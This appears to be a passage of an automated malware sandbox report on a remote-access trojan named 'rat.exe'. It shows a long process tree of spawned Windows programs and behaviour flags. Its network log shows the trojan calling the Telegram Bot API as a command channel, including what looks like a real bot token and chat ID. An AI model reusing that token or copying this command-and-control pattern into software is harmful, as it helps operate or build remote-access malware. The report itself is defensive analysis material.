      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:4172
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:10304
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5968
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:11216
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9816
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:6420
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8940
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7684
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6260
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:2744
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9724
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6192
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:4832
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6292
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8580
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7616
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8748
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:2876
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7156
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:6280
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:7572
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:8132
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:1144
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9212
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7804
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:2548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7308
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8852
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:4284
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8532
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:7520
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9648

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2656

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3d0 0x4a0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd3664cc40,0x7ffd3664cc4c,0x7ffd3664cc58
  2⤵
  PID:1904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1856,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1848 /prefetch:2
  2⤵
  PID:208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1992,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2000 /prefetch:3
  2⤵
  PID:696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2336 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:1732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=2200,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4024 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4352,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4956,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:8
  2⤵
  PID:1068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3348 /prefetch:8
  2⤵
  PID:4372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3664,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3388 /prefetch:8
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:4696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4040,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4812 /prefetch:8
  2⤵
  PID:3428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:8
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5248,i,3249739496238963560,14714064008546339060,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5228 /prefetch:2
  2⤵
  PID:3416

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:3312

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2660

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4168

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:2384

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5236

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5476

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4372

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5468

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5852

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5960

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2156

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6404

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6588

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6728

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6904

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5932

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6444

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5648

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7780

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8012

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8072

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5376

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5016

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8112

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4340

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6704

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8280

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8416

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8532

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9100

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3700

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8484

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9016

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9168

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8508

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8892

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9104

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9272

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9508

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9612

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9708

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9924

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10032

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10176

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8412

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9256

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9748

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2624

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:440

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9824

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10000

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10304

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10480

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10520

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10784

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10956

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11144

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9860

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8940

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3368

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10276

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:884

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4448

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3168

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1708

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7960

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10976

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10540

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8684

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

80.14.97.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.14.97.104.in-addr.arpa

IN PTR

Response

80.14.97.104.in-addr.arpa

IN PTR

a104-97-14-80deploystaticakamaitechnologiescom
DNS

134.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.32.126.40.in-addr.arpa

IN PTR

Response
DNS

google.com

rat.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.180.14
DNS

api.telegram.org

rat.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%8D%80%20Bot%20connected

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:12 GMT
Content-Type: application/json
Content-Length: 275
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:12 GMT
Content-Type: application/json
Content-Length: 391
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506641

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506641 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:14 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:16 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:17 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:18 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:21 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:16:24 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
